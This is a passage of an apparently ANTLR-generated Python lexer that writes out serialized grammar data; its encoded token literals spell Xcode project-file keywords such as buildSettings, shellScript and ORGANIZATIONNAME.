buf.write("\7v\2\2\u04ea\u04eb\7k\2\2\u04eb\u04ec\7h\2\2\u04ec\u04ed")
buf.write("\7k\2\2\u04ed\u04ee\7g\2\2\u04ee\u04ef\7t\2\2\u04ef\u0086")
buf.write("\3\2\2\2\u04f0\u04f1\7c\2\2\u04f1\u04f2\7v\2\2\u04f2\u04f3")
buf.write("\7v\2\2\u04f3\u04f4\7t\2\2\u04f4\u04f5\7k\2\2\u04f5\u04f6")
buf.write("\7d\2\2\u04f6\u04f7\7w\2\2\u04f7\u04f8\7v\2\2\u04f8\u04f9")
buf.write("\7g\2\2\u04f9\u04fa\7u\2\2\u04fa\u0088\3\2\2\2\u04fb\u04fc")
buf.write("\7N\2\2\u04fc\u04fd\7c\2\2\u04fd\u04fe\7u\2\2\u04fe\u04ff")
buf.write("\7v\2\2\u04ff\u0500\7U\2\2\u0500\u0501\7y\2\2\u0501\u0502")
buf.write("\7k\2\2\u0502\u0503\7h\2\2\u0503\u0504\7v\2\2\u0504\u0505")
buf.write("\7O\2\2\u0505\u0506\7k\2\2\u0506\u0507\7i\2\2\u0507\u0508")
buf.write("\7t\2\2\u0508\u0509\7c\2\2\u0509\u050a\7v\2\2\u050a\u050b")
buf.write("\7k\2\2\u050b\u050c\7q\2\2\u050c\u050d\7p\2\2\u050d\u008a")
buf.write("\3\2\2\2\u050e\u050f\7F\2\2\u050f\u0510\7g\2\2\u0510\u0511")
buf.write("\7h\2\2\u0511\u0512\7c\2\2\u0512\u0513\7w\2\2\u0513\u0514")
buf.write("\7n\2\2\u0514\u0515\7v\2\2\u0515\u0516\7D\2\2\u0516\u0517")
buf.write("\7w\2\2\u0517\u0518\7k\2\2\u0518\u0519\7n\2\2\u0519\u051a")
buf.write("\7f\2\2\u051a\u051b\7U\2\2\u051b\u051c\7{\2\2\u051c\u051d")
buf.write("\7u\2\2\u051d\u051e\7v\2\2\u051e\u051f\7g\2\2\u051f\u0520")
buf.write("\7o\2\2\u0520\u0521\7V\2\2\u0521\u0522\7{\2\2\u0522\u0523")
buf.write("\7r\2\2\u0523\u0524\7g\2\2\u0524\u0525\7H\2\2\u0525\u0526")
buf.write("\7q\2\2\u0526\u0527\7t\2\2\u0527\u0528\7Y\2\2\u0528\u0529")
buf.write("\7q\2\2\u0529\u052a\7t\2\2\u052a\u052b\7m\2\2\u052b\u052c")
buf.write("\7u\2\2\u052c\u052d\7r\2\2\u052d\u052e\7c\2\2\u052e\u052f")
buf.write("\7e\2\2\u052f\u0530\7g\2\2\u0530\u008c\3\2\2\2\u0531\u0532")
buf.write("\7N\2\2\u0532\u0533\7c\2\2\u0533\u0534\7u\2\2\u0534\u0535")
buf.write("\7v\2\2\u0535\u0536\7U\2\2\u0536\u0537\7y\2\2\u0537\u0538")
buf.write("\7k\2\2\u0538\u0539\7h\2\2\u0539\u053a\7v\2\2\u053a\u053b")
buf.write("\7W\2\2\u053b\u053c\7r\2\2\u053c\u053d\7f\2\2\u053d\u053e")
buf.write("\7c\2\2\u053e\u053f\7v\2\2\u053f\u0540\7g\2\2\u0540\u0541")
buf.write("\7E\2\2\u0541\u0542\7j\2\2\u0542\u0543\7g\2\2\u0543\u0544")
buf.write("\7e\2\2\u0544\u0545\7m\2\2\u0545\u008e\3\2\2\2\u0546\u0547")
buf.write("\7D\2\2\u0547\u0548\7w\2\2\u0548\u0549\7k\2\2\u0549\u054a")
buf.write("\7n\2\2\u054a\u054b\7f\2\2\u054b\u054c\7K\2\2\u054c\u054d")
buf.write("\7p\2\2\u054d\u054e\7f\2\2\u054e\u054f\7g\2\2\u054f\u0550")
buf.write("\7r\2\2\u0550\u0551\7g\2\2\u0551\u0552\7p\2\2\u0552\u0553")
buf.write("\7f\2\2\u0553\u0554\7g\2\2\u0554\u0555\7p\2\2\u0555\u0556")
buf.write("\7v\2\2\u0556\u0557\7V\2\2\u0557\u0558\7c\2\2\u0558\u0559")
buf.write("\7t\2\2\u0559\u055a\7i\2\2\u055a\u055b\7g\2\2\u055b\u055c")
buf.write("\7v\2\2\u055c\u055d\7u\2\2\u055d\u055e\7K\2\2\u055e\u055f")
buf.write("\7p\2\2\u055f\u0560\7R\2\2\u0560\u0561\7c\2\2\u0561\u0562")
buf.write("\7t\2\2\u0562\u0563\7c\2\2\u0563\u0564\7n\2\2\u0564\u0565")
buf.write("\7n\2\2\u0565\u0566\7g\2\2\u0566\u0567\7n\2\2\u0567\u0090")
buf.write("\3\2\2\2\u0568\u0569\7N\2\2\u0569\u056a\7c\2\2\u056a\u056b")
buf.write("\7u\2\2\u056b\u056c\7v\2\2\u056c\u056d\7V\2\2\u056d\u056e")
buf.write("\7g\2\2\u056e\u056f\7u\2\2\u056f\u0570\7v\2\2\u0570\u0571")
buf.write("\7k\2\2\u0571\u0572\7p\2\2\u0572\u0573\7i\2\2\u0573\u0574")
buf.write("\7W\2\2\u0574\u0575\7r\2\2\u0575\u0576\7i\2\2\u0576\u0577")
buf.write("\7t\2\2\u0577\u0578\7c\2\2\u0578\u0579\7f\2\2\u0579\u057a")
buf.write("\7g\2\2\u057a\u057b\7E\2\2\u057b\u057c\7j\2\2\u057c\u057d")
buf.write("\7g\2\2\u057d\u057e\7e\2\2\u057e\u057f\7m\2\2\u057f\u0092")
buf.write("\3\2\2\2\u0580\u0581\7N\2\2\u0581\u0582\7c\2\2\u0582\u0583")
buf.write("\7u\2\2\u0583\u0584\7v\2\2\u0584\u0585\7W\2\2\u0585\u0586")
buf.write("\7r\2\2\u0586\u0587\7i\2\2\u0587\u0588\7t\2\2\u0588\u0589")
buf.write("\7c\2\2\u0589\u058a\7f\2\2\u058a\u058b\7g\2\2\u058b\u058c")
buf.write("\7E\2\2\u058c\u058d\7j\2\2\u058d\u058e\7g\2\2\u058e\u058f")
buf.write("\7e\2\2\u058f\u0590\7m\2\2\u0590\u0094\3\2\2\2\u0591\u0592")
buf.write("\7Q\2\2\u0592\u0593\7T\2\2\u0593\u0594\7I\2\2\u0594\u0595")
buf.write("\7C\2\2\u0595\u0596\7P\2\2\u0596\u0597\7K\2\2\u0597\u0598")
buf.write("\7\\\2\2\u0598\u0599\7C\2\2\u0599\u059a\7V\2\2\u059a\u059b")
buf.write("\7K\2\2\u059b\u059c\7Q\2\2\u059c\u059d\7P\2\2\u059d\u059e")
buf.write("\7P\2\2\u059e\u059f\7C\2\2\u059f\u05a0\7O\2\2\u05a0\u05a1")
buf.write("\7G\2\2\u05a1\u0096\3\2\2\2\u05a2\u05a3\7V\2\2\u05a3\u05a4")
buf.write("\7c\2\2\u05a4\u05a5\7t\2\2\u05a5\u05a6\7i\2\2\u05a6\u05a7")
buf.write("\7g\2\2\u05a7\u05a8\7v\2\2\u05a8\u05a9\7C\2\2\u05a9\u05aa")
buf.write("\7v\2\2\u05aa\u05ab\7v\2\2\u05ab\u05ac\7t\2\2\u05ac\u05ad")
buf.write("\7k\2\2\u05ad\u05ae\7d\2\2\u05ae\u05af\7w\2\2\u05af\u05b0")
buf.write("\7v\2\2\u05b0\u05b1\7g\2\2\u05b1\u05b2\7u\2\2\u05b2\u0098")
buf.write("\3\2\2\2\u05b3\u05b4\7E\2\2\u05b4\u05b5\7t\2\2\u05b5\u05b6")
buf.write("\7g\2\2\u05b6\u05b7\7c\2\2\u05b7\u05b8\7v\2\2\u05b8\u05b9")
buf.write("\7g\2\2\u05b9\u05ba\7f\2\2\u05ba\u05bb\7Q\2\2\u05bb\u05bc")
buf.write("\7p\2\2\u05bc\u05bd\7V\2\2\u05bd\u05be\7q\2\2\u05be\u05bf")
buf.write("\7q\2\2\u05bf\u05c0\7n\2\2\u05c0\u05c1\7u\2\2\u05c1\u05c2")
buf.write("\7X\2\2\u05c2\u05c3\7g\2\2\u05c3\u05c4\7t\2\2\u05c4\u05c5")
buf.write("\7u\2\2\u05c5\u05c6\7k\2\2\u05c6\u05c7\7q\2\2\u05c7\u05c8")
buf.write("\7p\2\2\u05c8\u009a\3\2\2\2\u05c9\u05ca\7V\2\2\u05ca\u05cb")
buf.write("\7g\2\2\u05cb\u05cc\7u\2\2\u05cc\u05cd\7v\2\2\u05cd\u05ce")
buf.write("\7V\2\2\u05ce\u05cf\7c\2\2\u05cf\u05d0\7t\2\2\u05d0\u05d1")
buf.write("\7i\2\2\u05d1\u05d2\7g\2\2\u05d2\u05d3\7v\2\2\u05d3\u05d4")
buf.write("\7K\2\2\u05d4\u05d5\7F\2\2\u05d5\u009c\3\2\2\2\u05d6\u05d7")
buf.write("\7F\2\2\u05d7\u05d8\7g\2\2\u05d8\u05d9\7x\2\2\u05d9\u05da")
buf.write("\7g\2\2\u05da\u05db\7n\2\2\u05db\u05dc\7q\2\2\u05dc\u05dd")
buf.write("\7r\2\2\u05dd\u05de\7o\2\2\u05de\u05df\7g\2\2\u05df\u05e0")
buf.write("\7p\2\2\u05e0\u05e1\7v\2\2\u05e1\u05e2\7V\2\2\u05e2\u05e3")
buf.write("\7g\2\2\u05e3\u05e4\7c\2\2\u05e4\u05e5\7o\2\2\u05e5\u009e")
buf.write("\3\2\2\2\u05e6\u05e7\7R\2\2\u05e7\u05e8\7t\2\2\u05e8\u05e9")
buf.write("\7q\2\2\u05e9\u05ea\7x\2\2\u05ea\u05eb\7k\2\2\u05eb\u05ec")
buf.write("\7u\2\2\u05ec\u05ed\7k\2\2\u05ed\u05ee\7q\2\2\u05ee\u05ef")
buf.write("\7p\2\2\u05ef\u05f0\7k\2\2\u05f0\u05f1\7p\2\2\u05f1\u05f2")
buf.write("\7i\2\2\u05f2\u05f3\7U\2\2\u05f3\u05f4\7v\2\2\u05f4\u05f5")
buf.write("\7{\2\2\u05f5\u05f6\7n\2\2\u05f6\u05f7\7g\2\2\u05f7\u00a0")
buf.write("\3\2\2\2\u05f8\u05f9\7e\2\2\u05f9\u05fa\7q\2\2\u05fa\u05fb")
buf.write("\7o\2\2\u05fb\u05fc\7r\2\2\u05fc\u05fd\7c\2\2\u05fd\u05fe")
buf.write("\7v\2\2\u05fe\u05ff\7k\2\2\u05ff\u0600\7d\2\2\u0600\u0601")
buf.write("\7k\2\2\u0601\u0602\7n\2\2\u0602\u0603\7k\2\2\u0603\u0604")
buf.write("\7v\2\2\u0604\u0605\7{\2\2\u0605\u0606\7X\2\2\u0606\u0607")
buf.write("\7g\2\2\u0607\u0608\7t\2\2\u0608\u0609\7u\2\2\u0609\u060a")
buf.write("\7k\2\2\u060a\u060b\7q\2\2\u060b\u060c\7p\2\2\u060c\u00a2")
buf.write("\3\2\2\2\u060d\u060e\7f\2\2\u060e\u060f\7g\2\2\u060f\u0610")
buf.write("\7x\2\2\u0610\u0611\7g\2\2\u0611\u0612\7n\2\2\u0612\u0613")
buf.write("\7q\2\2\u0613\u0614\7r\2\2\u0614\u0615\7o\2\2\u0615\u0616")
buf.write("\7g\2\2\u0616\u0617\7p\2\2\u0617\u0618\7v\2\2\u0618\u0619")
buf.write("\7T\2\2\u0619\u061a\7g\2\2\u061a\u061b\7i\2\2\u061b\u061c")
buf.write("\7k\2\2\u061c\u061d\7q\2\2\u061d\u061e\7p\2\2\u061e\u00a4")
buf.write("\3\2\2\2\u061f\u0620\7j\2\2\u0620\u0621\7c\2\2\u0621\u0622")
buf.write("\7u\2\2\u0622\u0623\7U\2\2\u0623\u0624\7e\2\2\u0624\u0625")
buf.write("\7c\2\2\u0625\u0626\7p\2\2\u0626\u0627\7p\2\2\u0627\u0628")
buf.write("\7g\2\2\u0628\u0629\7f\2\2\u0629\u062a\7H\2\2\u062a\u062b")
buf.write("\7q\2\2\u062b\u062c\7t\2\2\u062c\u062d\7G\2\2\u062d\u062e")
buf.write("\7p\2\2\u062e\u062f\7e\2\2\u062f\u0630\7q\2\2\u0630\u0631")
buf.write("\7f\2\2\u0631\u0632\7k\2\2\u0632\u0633\7p\2\2\u0633\u0634")
buf.write("\7i\2\2\u0634\u0635\7u\2\2\u0635\u00a6\3\2\2\2\u0636\u0637")
buf.write("\7m\2\2\u0637\u0638\7p\2\2\u0638\u0639\7q\2\2\u0639\u063a")
buf.write("\7y\2\2\u063a\u063b\7p\2\2\u063b\u063c\7T\2\2\u063c\u063d")
buf.write("\7g\2\2\u063d\u063e\7i\2\2\u063e\u063f\7k\2\2\u063f\u0640")
buf.write("\7q\2\2\u0640\u0641\7p\2\2\u0641\u0642\7u\2\2\u0642\u00a8")
buf.write("\3\2\2\2\u0643\u0644\7o\2\2\u0644\u0645\7c\2\2\u0645\u0646")
buf.write("\7k\2\2\u0646\u0647\7p\2\2\u0647\u0648\7I\2\2\u0648\u0649")
buf.write("\7t\2\2\u0649\u064a\7q\2\2\u064a\u064b\7w\2\2\u064b\u064c")
buf.write("\7r\2\2\u064c\u00aa\3\2\2\2\u064d\u064e\7r\2\2\u064e\u064f")
buf.write("\7t\2\2\u064f\u0650\7q\2\2\u0650\u0651\7f\2\2\u0651\u0652")
buf.write("\7w\2\2\u0652\u0653\7e\2\2\u0653\u0654\7v\2\2\u0654\u0655")
buf.write("\7T\2\2\u0655\u0656\7g\2\2\u0656\u0657\7h\2\2\u0657\u0658")
buf.write("\7I\2\2\u0658\u0659\7t\2\2\u0659\u065a\7q\2\2\u065a\u065b")
buf.write("\7w\2\2\u065b\u065c\7r\2\2\u065c\u00ac\3\2\2\2\u065d\u065e")
buf.write("\7r\2\2\u065e\u065f\7c\2\2\u065f\u0660\7e\2\2\u0660\u0661")
buf.write("\7m\2\2\u0661\u0662\7c\2\2\u0662\u0663\7i\2\2\u0663\u0664")
buf.write("\7g\2\2\u0664\u0665\7T\2\2\u0665\u0666\7g\2\2\u0666\u0667")
buf.write("\7h\2\2\u0667\u0668\7g\2\2\u0668\u0669\7t\2\2\u0669\u066a")
buf.write("\7g\2\2\u066a\u066b\7p\2\2\u066b\u066c\7e\2\2\u066c\u066d")
buf.write("\7g\2\2\u066d\u066e\7u\2\2\u066e\u00ae\3\2\2\2\u066f\u0670")
buf.write("\7r\2\2\u0670\u0671\7t\2\2\u0671\u0672\7q\2\2\u0672\u0673")
buf.write("\7l\2\2\u0673\u0674\7g\2\2\u0674\u0675\7e\2\2\u0675\u0676")
buf.write("\7v\2\2\u0676\u0677\7F\2\2\u0677\u0678\7k\2\2\u0678\u0679")
buf.write("\7t\2\2\u0679\u067a\7R\2\2\u067a\u067b\7c\2\2\u067b\u067c")
buf.write("\7v\2\2\u067c\u067d\7j\2\2\u067d\u00b0\3\2\2\2\u067e\u067f")
buf.write("\7r\2\2\u067f\u0680\7t\2\2\u0680\u0681\7q\2\2\u0681\u0682")
buf.write("\7l\2\2\u0682\u0683\7g\2\2\u0683\u0684\7e\2\2\u0684\u0685")
buf.write("\7v\2\2\u0685\u0686\7T\2\2\u0686\u0687\7g\2\2\u0687\u0688")
buf.write("\7h\2\2\u0688\u0689\7g\2\2\u0689\u068a\7t\2\2\u068a\u068b")
buf.write("\7g\2\2\u068b\u068c\7p\2\2\u068c\u068d\7e\2\2\u068d\u068e")
buf.write("\7g\2\2\u068e\u068f\7u\2\2\u068f\u00b2\3\2\2\2\u0690\u0691")
buf.write("\7r\2\2\u0691\u0692\7t\2\2\u0692\u0693\7q\2\2\u0693\u0694")
buf.write("\7l\2\2\u0694\u0695\7g\2\2\u0695\u0696\7e\2\2\u0696\u0697")
buf.write("\7v\2\2\u0697\u0698\7T\2\2\u0698\u0699\7q\2\2\u0699\u069a")
buf.write("\7q\2\2\u069a\u069b\7v\2\2\u069b\u00b4\3\2\2\2\u069c\u069d")
buf.write("\7v\2\2\u069d\u069e\7c\2\2\u069e\u069f\7t\2\2\u069f\u06a0")
buf.write("\7i\2\2\u06a0\u06a1\7g\2\2\u06a1\u06a2\7v\2\2\u06a2\u06a3")
buf.write("\7u\2\2\u06a3\u00b6\3\2\2\2\u06a4\u06a5\7k\2\2\u06a5\u06a6")
buf.write("\7p\2\2\u06a6\u06a7\7r\2\2\u06a7\u06a8\7w\2\2\u06a8\u06a9")
buf.write("\7v\2\2\u06a9\u06aa\7H\2\2\u06aa\u06ab\7k\2\2\u06ab\u06ac")
buf.write("\7n\2\2\u06ac\u06ad\7g\2\2\u06ad\u06ae\7N\2\2\u06ae\u06af")
buf.write("\7k\2\2\u06af\u06b0\7u\2\2\u06b0\u06b1\7v\2\2\u06b1\u06b2")
buf.write("\7R\2\2\u06b2\u06b3\7c\2\2\u06b3\u06b4\7v\2\2\u06b4\u06b5")
buf.write("\7j\2\2\u06b5\u06b6\7u\2\2\u06b6\u00b8\3\2\2\2\u06b7\u06b8")
buf.write("\7k\2\2\u06b8\u06b9\7p\2\2\u06b9\u06ba\7r\2\2\u06ba\u06bb")
buf.write("\7w\2\2\u06bb\u06bc\7v\2\2\u06bc\u06bd\7R\2\2\u06bd\u06be")
buf.write("\7c\2\2\u06be\u06bf\7v\2\2\u06bf\u06c0\7j\2\2\u06c0\u06c1")
buf.write("\7u\2\2\u06c1\u00ba\3\2\2\2\u06c2\u06c3\7q\2\2\u06c3\u06c4")
buf.write("\7w\2\2\u06c4\u06c5\7v\2\2\u06c5\u06c6\7r\2\2\u06c6\u06c7")
buf.write("\7w\2\2\u06c7\u06c8\7v\2\2\u06c8\u06c9\7H\2\2\u06c9\u06ca")
buf.write("\7k\2\2\u06ca\u06cb\7n\2\2\u06cb\u06cc\7g\2\2\u06cc\u06cd")
buf.write("\7N\2\2\u06cd\u06ce\7k\2\2\u06ce\u06cf\7u\2\2\u06cf\u06d0")
buf.write("\7v\2\2\u06d0\u06d1\7R\2\2\u06d1\u06d2\7c\2\2\u06d2\u06d3")
buf.write("\7v\2\2\u06d3\u06d4\7j\2\2\u06d4\u06d5\7u\2\2\u06d5\u00bc")
buf.write("\3\2\2\2\u06d6\u06d7\7q\2\2\u06d7\u06d8\7w\2\2\u06d8\u06d9")
buf.write("\7v\2\2\u06d9\u06da\7r\2\2\u06da\u06db\7w\2\2\u06db\u06dc")
buf.write("\7v\2\2\u06dc\u06dd\7R\2\2\u06dd\u06de\7c\2\2\u06de\u06df")
buf.write("\7v\2\2\u06df\u06e0\7j\2\2\u06e0\u06e1\7u\2\2\u06e1\u00be")
buf.write("\3\2\2\2\u06e2\u06e3\7u\2\2\u06e3\u06e4\7j\2\2\u06e4\u06e5")
buf.write("\7g\2\2\u06e5\u06e6\7n\2\2\u06e6\u06e7\7n\2\2\u06e7\u06e8")
buf.write("\7R\2\2\u06e8\u06e9\7c\2\2\u06e9\u06ea\7v\2\2\u06ea\u06eb")
buf.write("\7j\2\2\u06eb\u00c0\3\2\2\2\u06ec\u06ed\7u\2\2\u06ed\u06ee")
buf.write("\7j\2\2\u06ee\u06ef\7g\2\2\u06ef\u06f0\7n\2\2\u06f0\u06f1")
buf.write("\7n\2\2\u06f1\u06f2\7U\2\2\u06f2\u06f3\7e\2\2\u06f3\u06f4")
buf.write("\7t\2\2\u06f4\u06f5\7k\2\2\u06f5\u06f6\7r\2\2\u06f6\u06f7")
buf.write("\7v\2\2\u06f7\u00c2\3\2\2\2\u06f8\u06f9\7u\2\2\u06f9\u06fa")
buf.write("\7j\2\2\u06fa\u06fb\7q\2\2\u06fb\u06fc\7y\2\2\u06fc\u06fd")
buf.write("\7G\2\2\u06fd\u06fe\7p\2\2\u06fe\u06ff\7x\2\2\u06ff\u0700")
buf.write("\7X\2\2\u0700\u0701\7c\2\2\u0701\u0702\7t\2\2\u0702\u0703")
buf.write("\7u\2\2\u0703\u0704\7K\2\2\u0704\u0705\7p\2\2\u0705\u0706")
buf.write("\7N\2\2\u0706\u0707\7q\2\2\u0707\u0708\7i\2\2\u0708\u00c4")
buf.write("\3\2\2\2\u0709\u070a\7v\2\2\u070a\u070b\7c\2\2\u070b\u070c")
buf.write("\7t\2\2\u070c\u070d\7i\2\2\u070d\u070e\7g\2\2\u070e\u070f")
buf.write("\7v\2\2\u070f\u00c6\3\2\2\2\u0710\u0711\7v\2\2\u0711\u0712")
buf.write("\7c\2\2\u0712\u0713\7t\2\2\u0713\u0714\7i\2\2\u0714\u0715")
buf.write("\7g\2\2\u0715\u0716\7v\2\2\u0716\u0717\7R\2\2\u0717\u0718")
buf.write("\7t\2\2\u0718\u0719\7q\2\2\u0719\u071a\7z\2\2\u071a\u071b")
buf.write("\7{\2\2\u071b\u00c8\3\2\2\2\u071c\u071d\7h\2\2\u071d\u071e")
buf.write("\7k\2\2\u071e\u071f\7n\2\2\u071f\u0720\7g\2\2\u0720\u0721")
buf.write("\7V\2\2\u0721\u0722\7{\2\2\u0722\u0723\7r\2\2\u0723\u0724")
buf.write("\7g\2\2\u0724\u00ca\3\2\2\2\u0725\u0726\7t\2\2\u0726\u0727")
buf.write("\7g\2\2\u0727\u0728\7o\2\2\u0728\u0729\7q\2\2\u0729\u072a")
buf.write("\7v\2\2\u072a\u072b\7g\2\2\u072b\u072c\7T\2\2\u072c\u072d")
buf.write("\7g\2\2\u072d\u072e\7h\2\2\u072e\u00cc\3\2\2\2\u072f\u0730")
buf.write("\7d\2\2\u0730\u0731\7c\2\2\u0731\u0732\7u\2\2\u0732\u0733")
buf.write("\7g\2\2\u0733\u0734\7E\2\2\u0734\u0735\7q\2\2\u0735\u0736")
buf.write("\7p\2\2\u0736\u0737\7h\2\2\u0737\u0738\7k\2\2\u0738\u0739")
buf.write("\7i\2\2\u0739\u073a\7w\2\2\u073a\u073b\7t\2\2\u073b\u073c")
buf.write("\7c\2\2\u073c\u073d\7v\2\2\u073d\u073e\7k\2\2\u073e\u073f")
buf.write("\7q\2\2\u073f\u0740\7p\2\2\u0740\u0741\7T\2\2\u0741\u0742")
buf.write("\7g\2\2\u0742\u0743\7h\2\2\u0743\u0744\7g\2\2\u0744\u0745")
buf.write("\7t\2\2\u0745\u0746\7g\2\2\u0746\u0747\7p\2\2\u0747\u0748")
buf.write("\7e\2\2\u0748\u0749\7g\2\2\u0749\u00ce\3\2\2\2\u074a\u074b")
buf.write("\7d\2\2\u074b\u074c\7w\2\2\u074c\u074d\7k\2\2\u074d\u074e")
buf.write("\7n\2\2\u074e\u074f\7f\2\2\u074f\u0750\7U\2\2\u0750\u0751")
buf.write("\7g\2\2\u0751\u0752\7v\2\2\u0752\u0753\7v\2\2\u0753\u0754")
buf.write("\7k\2\2\u0754\u0755\7p\2\2\u0755\u0756\7i\2\2\u0756\u0757")
buf.write("\7u\2\2\u0757\u00d0\3\2\2\2\u0758\u0759\7f\2\2\u0759\u075a")
buf.write("\7u\2\2\u075a\u075b\7v\2\2\u075b\u075c\7R\2\2\u075c\u075d")
buf.write("\7c\2\2\u075d\u075e\7v\2\2\u075e\u075f\7j\2\2\u075f\u00d2")
buf.write("\3\2\2\2\u0760\u0761\7f\2\2\u0761\u0762\7u\2\2\u0762\u0763")
buf.write("\7v\2\2\u0763\u0764\7U\2\2\u0764\u0765\7w\2\2\u0765\u0766")
buf.write("\7d\2\2\u0766\u0767\7h\2\2\u0767\u0768\7q\2\2\u0768\u0769")
buf.write("\7n\2\2\u0769\u076a\7f\2\2\u076a\u076b\7g\2\2\u076b\u076c")
buf.write("\7t\2\2\u076c\u076d\7U\2\2\u076d\u076e\7r\2\2\u076e\u076f")
buf.write("\7g\2\2\u076f\u0770\7e\2\2\u0770\u00d4\3\2\2\2\u0771\u0772")
buf.write("\7R\2\2\u0772\u0773\7t\2\2\u0773\u0774\7q\2\2\u0774\u0775")
buf.write("\7f\2\2\u0775\u0776\7w\2\2\u0776\u0777\7e\2\2\u0777\u0778")
buf.write("\7v\2\2\u0778\u0779\7I\2\2\u0779\u077a\7t\2\2\u077a\u077b")
buf.write("\7q\2\2\u077b\u077c\7w\2\2\u077c\u077d\7r\2\2\u077d\u00d6")
buf.write("\3\2\2\2\u077e\u077f\7R\2\2\u077f\u0780\7t\2\2\u0780\u0781")
buf.write("\7q\2\2\u0781\u0782\7l\2\2\u0782\u0783\7g\2\2\u0783\u0784")
buf.write("\7e\2\2\u0784\u0785\7v\2\2\u0785\u0786\7T\2\2\u0786\u0787")
buf.write("\7g\2\2\u0787\u0788\7h\2\2\u0788\u00d8\3\2\2\2\u0789\u078a")
buf.write("\7d\2\2\u078a\u078b\7w\2\2\u078b\u078c\7k\2\2\u078c\u078d")
buf.write("\7n\2\2\u078d\u078e\7f\2\2\u078e\u078f\7E\2\2\u078f\u0790")
buf.write("\7q\2\2\u0790\u0791\7p\2\2\u0791\u0792\7h\2\2\u0792\u0793")
buf.write("\7k\2\2\u0793\u0794\7i\2\2\u0794\u0795\7w\2\2\u0795\u0796")
buf.write("\7t\2\2\u0796\u0797\7c\2\2\u0797\u0798\7v\2\2\u0798\u0799")
buf.write("\7k\2\2\u0799\u079a\7q\2\2\u079a\u079b\7p\2\2\u079b\u079c")
buf.write("\7u\2\2\u079c\u00da\3\2\2\2\u079d\u079e\7f\2\2\u079e\u079f")
buf.write("\7g\2\2\u079f\u07a0\7h\2\2\u07a0\u07a1\7c\2\2\u07a1\u07a2")
buf.write("\7w\2\2\u07a2\u07a3\7n\2\2\u07a3\u07a4\7v\2\2\u07a4\u07a5")
buf.write("\7E\2\2\u07a5\u07a6\7q\2\2\u07a6\u07a7\7p\2\2\u07a7\u07a8")
buf.write("\7h\2\2\u07a8\u07a9\7k\2\2\u07a9\u07aa\7i\2\2\u07aa\u07ab")
buf.write("\7w\2\2\u07ab\u07ac\7t\2\2\u07ac\u07ad\7c\2\2\u07ad\u07ae")
buf.write("\7v\2\2\u07ae\u07af\7k\2\2\u07af\u07b0\7q\2\2\u07b0\u07b1")
buf.write("\7p\2\2\u07b1\u07b2\7K\2\2\u07b2\u07b3\7u\2\2\u07b3\u07b4")
buf.write("\7X\2\2\u07b4\u07b5\7k\2\2\u07b5\u07b6\7u\2\2\u07b6\u07b7")
buf.write("\7k\2\2\u07b7\u07b8\7d\2\2\u07b8\u07b9\7n\2\2\u07b9\u07ba")
buf.write("\7g\2\2\u07ba\u00dc\3\2\2\2\u07bb\u07bc\7f\2\2\u07bc\u07bd")
buf.write("\7g\2\2\u07bd\u07be\7h\2\2\u07be\u07bf\7c\2\2\u07bf\u07c0")
buf.write("\7w\2\2\u07c0\u07c1\7n\2\2\u07c1\u07c2\7v\2\2\u07c2\u07c3")
buf.write("\7E\2\2\u07c3\u07c4\7q\2\2\u07c4\u07c5\7p\2\2\u07c5\u07c6")
buf.write("\7h\2\2\u07c6\u07c7\7k\2\2\u07c7\u07c8\7i\2\2\u07c8\u07c9")
buf.write("\7w\2\2\u07c9\u07ca\7t\2\2\u07ca\u07cb\7c\2\2\u07cb\u07cc")
buf.write("\7v\2\2\u07cc\u07cd\7k\2\2\u07cd\u07ce\7q\2\2\u07ce\u07cf")
buf.write("\7p\2\2\u07cf\u07d0\7P\2\2\u07d0\u07d1\7c\2\2\u07d1\u07d2")
buf.write("\7o\2\2\u07d2\u07d3\7g\2\2\u07d3\u00de\3\2\2\2\u07d4\u07d5")
buf.write("\7u\2\2\u07d5\u07d6\7g\2\2\u07d6\u07d7\7v\2\2\u07d7\u07d8")
buf.write("\7v\2\2\u07d8\u07d9\7k\2\2\u07d9\u07da\7p\2\2\u07da\u07db")
buf.write("\7i\2\2\u07db\u07dc\7u\2\2\u07dc\u00e0\3\2\2\2\u07dd\u07de")
buf.write("\7U\2\2\u07de\u07df\7{\2\2\u07df\u07e0\7u\2\2\u07e0\u07e1")
buf.write("\7v\2\2\u07e1\u07e2\7g\2\2\u07e2\u07e3\7o\2\2\u07e3\u07e4")
buf.write("\7E\2\2\u07e4\u07e5\7c\2\2\u07e5\u07e6\7r\2\2\u07e6\u07e7")
buf.write("\7c\2\2\u07e7\u07e8\7d\2\2\u07e8\u07e9\7k\2\2\u07e9\u07ea")
buf.write("\7n\2\2\u07ea\u07eb\7k\2\2\u07eb\u07ec\7v\2\2\u07ec\u07ed")
buf.write("\7k\2\2\u07ed\u07ee\7g\2\2\u07ee\u07ef\7u\2\2\u07ef\u00e2")
buf.write("\3\2\2\2\u07f0\u07f1\7e\2\2\u07f1\u07f2\7w\2\2\u07f2\u07f3")
buf.write("\7t\2\2\u07f3\u07f4\7t\2\2\u07f4\u07f5\7g\2\2\u07f5\u07f6")
buf.write("\7p\2\2\u07f6\u07f7\7v\2\2\u07f7\u07f8\7X\2\2\u07f8\u07f9")
buf.write("\7g\2\2\u07f9\u07fa\7t\2\2\u07fa\u07fb\7u\2\2\u07fb\u07fc")
buf.write("\7k\2\2\u07fc\u07fd\7q\2\2\u07fd\u07fe\7p\2\2\u07fe\u00e4")
buf.write("\3\2\2\2\u07ff\u0800\7x\2\2\u0800\u0801\7g\2\2\u0801\u0802")
buf.write("\7t\2\2\u0802\u0803\7u\2\2\u0803\u0804\7k\2\2\u0804\u0805")
buf.write("\7q\2\2\u0805\u0806\7p\2\2\u0806\u0807\7I\2\2\u0807\u0808")
buf.write("\7t\2\2\u0808\u0809\7q\2\2\u0809\u080a\7w\2\2\u080a\u080b")
buf.write("\7r\2\2\u080b\u080c\7V\2\2\u080c\u080d\7{\2\2\u080d\u080e")
buf.write("\7r\2\2\u080e\u080f\7g\2\2\u080f\u00e6\3\2\2\2\u0810\u0811")
buf.write("\7E\2\2\u0811\u0812\7N\2\2\u0812\u0813\7C\2\2\u0813\u0814")
buf.write("\7U\2\2\u0814\u0815\7U\2\2\u0815\u0816\7R\2\2\u0816\u0817")
buf.write("\7T\2\2\u0817\u0818\7G\2\2\u0818\u0819\7H\2\2\u0819\u081a")
buf.write("\7K\2\2\u081a\u081b\7Z\2\2\u081b\u00e8\3\2\2\2\u081c\u081d")
buf.write("\7e\2\2\u081d\u081e\7n\2\2\u081e\u081f\7c\2\2\u081f\u0820")
buf.write("\7u\2\2\u0820\u0821\7u\2\2\u0821\u0822\7g\2\2\u0822\u0823")
